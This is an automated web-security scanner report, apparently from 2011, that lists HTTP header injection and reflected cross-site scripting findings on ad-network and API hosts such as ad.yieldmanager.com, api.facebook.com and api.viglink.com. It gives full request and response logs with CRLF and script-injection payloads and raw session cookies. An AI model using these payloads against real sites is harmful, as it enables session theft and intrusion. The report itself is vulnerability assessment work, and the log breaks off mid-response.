ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Sun, 13 Feb 2011 14:20:10 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 13 Feb 2011 14:35:10 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298211610; path=/; expires=Sun, 20-Feb-11 14:20:10 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297606810^1297608610|84bf8
588720eedd1
^1297606810^1297608610; path=/; expires=Sun, 13-Feb-11 14:50:10 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; expires=Wed, 08-Feb-12 14:20:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 13-Feb-11 20:20:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5; expires=Wed, 08-Feb-12 14:20:10 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=; expires=Wed, 08-Feb-12 14:20:10 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

1.11. http://us.ebayobjects.com/1ai/ebay.ebayus.58058/networking_and_communications [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.ebayobjects.com
Path:   /1ai/ebay.ebayus.58058/networking_and_communications

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83fcc%0d%0ac9d46bf1ef4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83fcc%0d%0ac9d46bf1ef4/ebay.ebayus.58058/networking_and_communications;cat=58058;cat=11176;seg=GL_Visitors;tcat=11175;items=548822;sz=160x600;ord=1297458429617;u=i_7019525320840896656%7Cm_172574;dcopt=ist;tile=1;um=0;us=13;eb_trk=172574;pr=20;xp=20;np=20;uz=;cg=f65c9e8712d0a0aa12e4b294ff6547f1 HTTP/1.1
Host: us.ebayobjects.com
Proxy-Connection: keep-alive
Referer: http://computers.shop.ebay.com/Networking-Communications-/11176/i.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/83fcc
c9d46bf1ef4
/ebay.ebayus.58058/networking_and_communications%3Bcat%3D58058%3Bcat%3D11176%3Bseg%3DGL_Visitors%3Btcat%3D11175%3Bitems%3D548822%3Bsz%3D160x600%3Bord%3D1297458429617%3Bu%3Di_7019525320840896656%7Cm_172574%3Bdcopt%3Dist%3Btile%3D1%3Bum%3D0%3Bus%3D13%3Beb_trk%3D172574%3Bpr%3D20%3Bxp%3D20%3Bnp%3D20%3Buz%3D%3Bcg%3Df65c9e8712d0a0aa12e4b294ff6547f1

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)

There are 130 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
2.1. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95cdf"-alert(1)-"14e796c9f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=1333214&95cdf"-alert(1)-"14e796c9f61=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/hubs/hot/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!A!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~!#mP:!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mP>!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPA!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPD!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#
G!#mPG!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#mPJ!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<mQ6=!!!#G!#LI8!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#LI9!!!$h!#5Qg!0EGL!%<A9!!H<)!?5%!'2BP2!wVd.!$2)w!!j:k!'@?[~~~~~<m,_i<mEWd!!!#G!#p!r!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL!#p!u!!!%O!!t<e!0L[#!%Bbn!!H<'!#My1%n/M3!wVd.!#E>X!!j:k!'H85~~~~~<m8>B<m8SQ!!.vL"; ih="b!!!!N!%!-u!!!!#<m9Vb!(4uP!!!!#<m8>D!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/WT!!!!#<m*Y#!+/Wc!!!!#<jbN?!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!-6s<!!!!#<m0_5!->h]!!!!%<m#26!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.T97!!!!#<k:^)!.`.U!!!!(<mZpq!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/?V,!!!!$<m!WT!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/S5#!!!!#<m*q.!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o!S!!!!#<m05y!/oCq!!!!'<m8A]!/oD)!!!!#<m!Tu!/pg`!!!!#<mCQ(!/pga!!!!$<m*q+!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!00Gv!!!!#<l`GD!03?y!!!!#<m8Ab!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0!0C^(!!!!#<m8=j!0EGL!!!!#<m,_i!0LZy!!!!#<m,_`!0L[#!!!!$<m8>B"; vuday1=Gf(n`NFd*luBw.^; 
bh="b!!!%1!!$ha!!?fS<mZsO!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!%<m#np!!,D(!!!!'<m#np!!-?2!!!!*<m#np!!-G2!!!!$<lise!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!)<m#np!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!%<lmXb!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!(<m#np!!2)5!!!!#<m#np!!2a*!!!!#<ln<2!!4<u!!!!)<m#np!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!7gK!!!!#<lm]6!!<@x!!!!%<lSWC!!<P5!!!!#<m#np!!<P6!!!!#<m#np!!?VS!!DPb<lQiA!!C5(!!!!#<m#np!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L(^!!!!'<m8qE!!L_w!!!!+<m8qE!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!$<m#np!!ObV!!!!$<m#np!!OgU!!!!(<m#np!!T[J!!!!$<lm]6!!Z-E!!!!$<m#np!!Z-G!!!!$<m#np!!Z-L!!!!$<m#np!!Zw`!!!!%<m#np!!Zwb!!!!'<m#np!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!g[x!!!!#<m#np!!hqJ!!!!#<lP]!!!iEC!!!!'<m#np!!iEb!!!!)<m#np!!i_9!!!!$<m#np!!jD6!!!!#<lja'!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!$<lmXb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!ti>!!!!#<m!S_!!u[u!!!!(<lVbU!!utd!!!!(<lVbU!!utl!!!!#<lSD*!!uto!!!!#<lVbU!!uu)!!!!%<lSVZ!!v:e!!!!(<m#np!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!#!vF!!!!#<m*gT!#!vL!!!!#<m*gT!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#')-!!!!#<k2yx!#*<R!!!!%<ln'v!#*VS!!!!#<jLPe!#+]S!!!!(<m#np!#,##!!!!'<lSWC!#-vv!!!!$<iC/K!#.dO!!!!+<m8qE!#/:a!!!!$<lmXf!#/G2!!!!$<m#np!#/G<!!!!$<m#np!#/GO!!!!$<m#np!#/j>!!!!#<m*gT!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!?fS<mZsO!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3(M!!!!#<m*gT!#3>,!!!!#<lmWu!#3>9!!!!#<lxx`!#3>C!!!!#<lxx]!#3>M!!!!#<lmdr!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!*<m#np!#8*^!!!!#<mC=k!#8.'!!!!$<lmXe!#8:i!!!!#<jc#c!#8?7!!!!$<lmXb!#8A2!!!!#<k11E!#<T3!!!!#<jbNC!#@7F!!!!#<m8qE!#@wb!!!!#<m*gT!#CC>!!!!#<lS@,!#F1H!!!!'<lS0M!#FGA!!!!%<ln'v!#Fu6!!!!$<lm]6!#Fw_!!!!%<ln'v!#I=D!!!!,<m915!#Ic1!!!!$<lmXc!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#LaM!!!!#<m,_i!#MP0!!!!#<jLPe!#MTC!!!!-<m9Vb!#MTF!!!!-<m9Vb!#MTH!!!!-
<m9Vb!#MTI!!!!-<m9Vb!#MTJ!!!!-<m9Vb!#NjS!!!!#<lI#*!#O4F!!!!#<m*gT!#O4I!!!!#<m*gT!#O4M!!!!#<m*gT!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#OH-!!!!#<m*gT!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!+<m8qE!#Q<o!!!!#<mC=k!#Qh8!!!!#<l.yn!#RSx!!!!#<m*gT!#RY.!!!!'<m8qE!#Ri/!!!!+<m8qE!#Rij!!!!+<m8qE!#SCj!!!!%<m*l:!#SCk!!!!(<m8qG!#SUp!!!!(<m#np!#SVp!!!!#<m*gT!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!$<lmXe!#TnE!!!!*<m9Vb!#Tnp!!!!$<lmXb!#UDQ!!!!-<m9Vb!#UJ4!!!!#<m*gT!#UJ9!!!!#<m*gT!#UL(!!!!%<lQW%!#VYG!!!!(<mCr1!#V]o!!!!%<mCr1!#V]u!!!!'<mCr1!#V]v!!!!'<mCr1!#W,W!!!!'<mCr1!#W-B!!!!%<mCr1!#W-^!!!!%<mCr1!#W.*!!!!'<mCr1!#W.B!!!!#<m*XR!#W.Q!!!!'<mCr1!#W/5!!!!'<mCr1!#W/A!!!!'<mCr1!#W/J!!!!$<m:Vy!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X:Z!!!!#<m*gT!#X]+!!!!'<kdT!!#X]l!!!!'<m8qE!#Zb%!!!!#<m#np!#ZbF!!!!#<m#np!#ZbM!!!!#<m#np!#ZhT!!!!*<m#np!#Zmf!!!!$<kT`F!#[25!!!!%<lhqW!#[L>!!!!%<lise!#]%`!!!!$<m*Yw!#]DN!!!!#<m8qE!#]W%!!!!'<m8qE!#]Z#!!!!#<m#np!#^$?!!!!#<m*gT!#^0$!!!!(<m#np!#^0%!!!!(<m#np!#^Bo!!!!'<m8qE!#^d6!!!!$<m*Yw!#_+6!!!!#<m*gT!#_0t!!!!%<kTb(!#_1L!!!!#<m*gT!#`T=!!!!#<m#np!#`T>!!!!#<m#np!#`TF!!!!#<m#np!#`TG!!!!#<m#np!#`TJ!!!!#<m#np!#`TK!!!!#<m#np!#aCq!!!!'<lisd!#aG>!!!!+<m8qE!#aM'!!!!#<kp_p!#aly!!!!#<m*gT!#av4!!!!$<m!TH!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b?A!!!!#<l.x@!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#cC!!!!!#<ie2`!#dCU!!!!#<m*gT!#e)`!!!!#<m:W!!#e@W!!!!#<k_2)!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#fBj!!!!)<m#np!#fBk!!!!)<m#np!#fBm!!!!)<m#np!#fBn!!!!)<m#np!#fE=!!!!'<lQj,!#fG+!!!!)<m#np!#fJ/!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g/7!!!!(<m#np!#gC:!!!!#<lmdV!#gHO!!!!#<m*gT!#gPp!!!!#<m!TX!#gRx!!!!#<htU3!#g[h!!!!'<m8qE!#g]5!!!!#<lm]?!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#gq`!!!!#<m*gT!#h.N!!!!#<kL2n!#jRq!!!!#<mZv)!#jS>!!!!#<k_Jy!#mJR!!!!#<m8qE!#mP5!!!!$<lise!#mP6!!!!$<lise!#naX!!!!'<m8qE!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#ne$!!!!$<lP]'!#p#b!!!!'<m8qE
!#p9d!!!!#<lj09!#pD8!!!!'<m8>B!#sx#!!!!3<m9Vd"

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:17:00 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Fri, 11 Feb 2011 18:17:00 GMT
Pragma: no-cache
Content-Length: 4645
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?95cdf"-alert(1)-"14e796c9f61=1&Z=728x90&s=1333214&_salt=2292189709";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

2.2. http://api.facebook.com/restserver.php [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the method request parameter is copied unencoded into a JSON string literal inside the JSONP response, which is served as text/javascript rather than as an HTML document. The payload 5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7 was submitted in the method parameter. This input was echoed as 5381e<img src=a onerror=alert(1)>9d6042fa9f7 in the application's response.

This shows that angle brackets in the parameter reach the response unencoded, but the payload does not break out of the string literal: when the response is consumed as JSONP through a script tag, the img element is inert string content, and it only executes as markup if a browser renders the text/javascript body as an HTML document. Rate this finding by the client's content-type handling rather than as a certain script injection.

Request

GET /restserver.php?v=1.0&method=links.getStats5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:20 GMT
Content-Length: 360

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats5381e<img src=a onerror=alert(1)>9d6042fa9f7"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

2.3. http://api.facebook.com/restserver.php [urls parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The value of the urls request parameter is copied unencoded into a JSON string literal inside the JSONP response, which is served as text/javascript rather than as an HTML document. The payload 8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9 was submitted in the urls parameter. This input was echoed as 8585e<img src=a onerror=alert(1)>f213777d1e9 in the application's response.

As with the method parameter, the angle brackets survive unencoded but the payload stays inside the JSON string; it executes only if a browser renders the text/javascript body as HTML. Note also that this error response is marked Cache-Control: public, max-age=120, so a shared cache in the path may serve the reflected body to other clients requesting the same URL.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 11 Feb 2011 10:17:39 -0800
Pragma:
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Length: 376

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]8585e<img src=a onerror=alert(1)>f213777d1e9"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

2.4. http://api.viglink.com/api/ping [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.viglink.com
Path:   /api/ping

Issue detail

The value of the key request parameter is copied unencoded into the body of the HTTP 500 error response, which is served as text/html. The payload 7e217<script>alert(1)</script>53abc6bf11f was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response: the browser parses a text/html body as HTML regardless of the 500 status code, so the injected script element executes. The reflection is on the error path (unknown key), which an attacker controls simply by supplying an invalid key.

Request

GET /api/ping?format=jsonp&key=2b0adaafa9ad8a29fede7758fada17307e217<script>alert(1)</script>53abc6bf11f&loc=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F219333%2Fonline_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%3Dhp_fv&v=1&jsonp=vglnk_jsonp_12974526338310 HTTP/1.1
Host: api.viglink.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 11 Feb 2011 19:30:09 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: keep-alive
